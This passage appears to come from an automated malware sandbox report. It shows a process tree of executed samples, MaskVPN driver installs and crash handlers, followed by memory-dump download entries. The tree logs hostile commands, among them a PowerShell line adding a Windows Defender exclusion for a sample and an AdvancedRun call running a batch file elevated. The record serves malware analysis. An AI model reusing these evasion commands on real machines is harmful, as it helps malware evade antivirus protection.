                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                    PID:2116
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\80A9.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\80A9.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5652 -ip 5652
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                      PID:3248
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                      PID:5228
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                        DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{04d9477a-5659-2b4d-9fc1-2572ccb4d04a}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:2760
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                        DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "fcaa"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                        PID:4972
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                      PID:5000
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1708
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 680 -p 5632 -ip 5632
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                        PID:5176
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5336 -ip 5336
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                        PID:6340
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1192 -ip 1192
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                        PID:4732
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B288.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B288.exe
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                        PID:680
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:6160
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\56C.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\56C.exe
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6400
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fb32370c-e257-4692-95e2-ec3b3ba037e3\AdvancedRun.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\fb32370c-e257-4692-95e2-ec3b3ba037e3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fb32370c-e257-4692-95e2-ec3b3ba037e3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1460
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fb32370c-e257-4692-95e2-ec3b3ba037e3\test.bat"
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:432
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\56C.exe" -Force
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\56C.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\56C.exe
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:588
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6792
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                    PID:3876
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2C00.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2C00.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                    PID:6872
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4896
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 876
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                        PID:256
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5712
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4896 -ip 4896
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                        PID:3512
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2664
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:664
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6352
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6224
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                PID:2272
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3688
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                  PID:2036
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1160
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5712 -ip 5712
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5572
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5308 -ip 5308
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                      PID:5892
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 6240 -ip 6240
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                      PID:2260
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7048
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A145.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A145.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1960
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 312
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                                            PID:1520
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1960 -ip 1960
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4048
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\47FA.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\47FA.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:5124
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MendacityTrizonal_2021-08-21_22-48.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\MendacityTrizonal_2021-08-21_22-48.exe"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3996
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 308
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6588
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\david.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\david.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\david.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2176
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3996 -ip 3996
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4832

                                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/72-209-0x0000000001660000-0x000000000167C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/72-231-0x000000001BE10000-0x000000001BE12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/72-194-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/428-388-0x0000000005070000-0x0000000005688000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1168-188-0x0000000000A20000-0x0000000000A32000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1168-178-0x00000000007E0000-0x00000000007F0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1204-334-0x0000000005BF0000-0x0000000005BF1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1204-275-0x0000000000820000-0x0000000000821000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1464-307-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-258-0x0000000000E90000-0x0000000000E91000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-272-0x00000000062B0000-0x00000000062B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-276-0x00000000063D0000-0x00000000063D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-333-0x0000000006540000-0x0000000006541000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-281-0x0000000006310000-0x0000000006311000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-268-0x00000000068D0000-0x00000000068D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1480-330-0x00000000062A0000-0x00000000062A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1528-283-0x0000018CBD760000-0x0000018CBD770000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1528-289-0x0000018CBD9A0000-0x0000018CBD9B0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1528-314-0x0000018CBDBD0000-0x0000018CBDBD4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      16KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1552-284-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1552-317-0x0000000005810000-0x0000000005811000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1552-361-0x0000000005710000-0x0000000005CB6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1844-440-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1900-274-0x0000000002550000-0x000000000257F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      188KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2012-424-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2468-389-0x00000000049D0000-0x00000000052F6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2716-443-0x0000000000630000-0x0000000000631000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2776-328-0x00000000024C0000-0x00000000024EF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      188KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2852-220-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3040-146-0x00000000035C0000-0x00000000036FF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3100-372-0x0000000004D30000-0x0000000004D46000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3176-414-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3208-478-0x000000001AF10000-0x000000001AF12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3348-447-0x0000000005600000-0x0000000005601000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3428-419-0x0000000004B10000-0x0000000004BAD000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                                                                                                                                                                                      Download

